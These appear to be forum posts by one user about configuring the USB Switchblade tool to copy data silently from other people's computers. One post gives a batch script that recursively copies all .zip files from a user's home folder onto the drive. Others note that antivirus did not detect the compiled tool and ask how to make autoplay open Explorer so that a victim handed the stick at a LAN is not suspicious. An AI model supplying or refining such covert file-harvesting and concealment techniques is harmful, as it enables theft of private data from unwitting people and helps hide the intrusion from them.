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    Tamworth, Australia

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  1. When you think about it, it _would_ be slightly difficult for people who try to run, say, cmd.exe, and have it open as a textfile. If they didn't know how to get to a command prompt *cough*Safe Mode*cough* then things could really be interesting for them. We had a virus problem at work a few years ago, where the virus assosicated itself with every executable file there was. Problem was, the boss deleted the virus file before telling me about it, so there I am, trying to reset things, without being to get to a command prompt or regedit.
  2. Ahriman


    I just compiled the program, haven't yet put it into my Switchblade, but AVG didn't pick it up as a virus/hacktol/etc at all. Although, I didn't set the options during compile to run in stealth mode, as it had errors when I followed he authors instructions regarding this. I have asked him about it, will see what happens then.
  3. In order to go through different directories, you could use this line with the above code: @echo off REM say we only want to check the user's documents and settings path ... cd %HOMEPATH% FOR /F "tokens=*" %%i IN ('dir/s/b/x *.zip') DO xcopy /a /e /k /q "%%i" ..FILES (of course, you would have to make a folder in your WIP folder called FILES for it to copy them into. Also, I found on my system when I tested this command that some of the zip files were quite big in size...) Edit: I want to edit my above code, to let you know when it's done copying the files. Using a tool called MsgBox (found http://www.lgcoding.com.au/files/msgbox.exe ). The updated code is now: ]@echo off REM say we only want to check the user's documents and settings path ... cd %HOMEPATH% FOR /F "tokens=*" %%i IN ('dir/s/b/x *.zip') DO xcopy /a /e /k /q "%%i" ..FILES msgbox /BO /H /II /MS /T5 "Data Copied" Files have been copied successfully. This will, when it has finished copying, display for 5 seconds a small dialog box, that says the data is copied OK. You can change the parameters in it (just type at a command prompt: msgbox /? )
  4. I got one from network0.org, found the link in one of the posts here. It was the first one I could find that was still available. Otherwise, I suppose googling "switchblade usb" or something might find a few more options.
  5. It's possible that it's my system thats causing that method to not work, as I have only tried it on this one so far. Over the weekend, I'll be able to test it on some other machines, and see which method works on those.
  6. Awesome, that worked a treat, thanks heaps.
  7. Tried that just then, still nothing. Even changed the command to be start explorer or start explorer but while it works properly if I double-click the go.cmd file, running it via autoplay seems to ignore this. Even tried the suggestions put forward in this post, but nothing :S
  8. I have been running Siliv's version of Switchblade, and it is sweeeeet! Just one question, though (there's always one): After the drive has been inserted, and the user has clicked the "Open.." in autorun, switchblade does its thing. I can see a problem right away in that it doesn't open an explorer window, so were I to pass this to someone at, say a LAN, they woudl straight away know that something is screwy. I have tried adding this to just before the :END call: start explorer.exe .... but this seems to have no effect. Anyone else have any ideas how i could get it to open explorer when it's done it's thing, so that it doesn't arouse suspicion? Cheers
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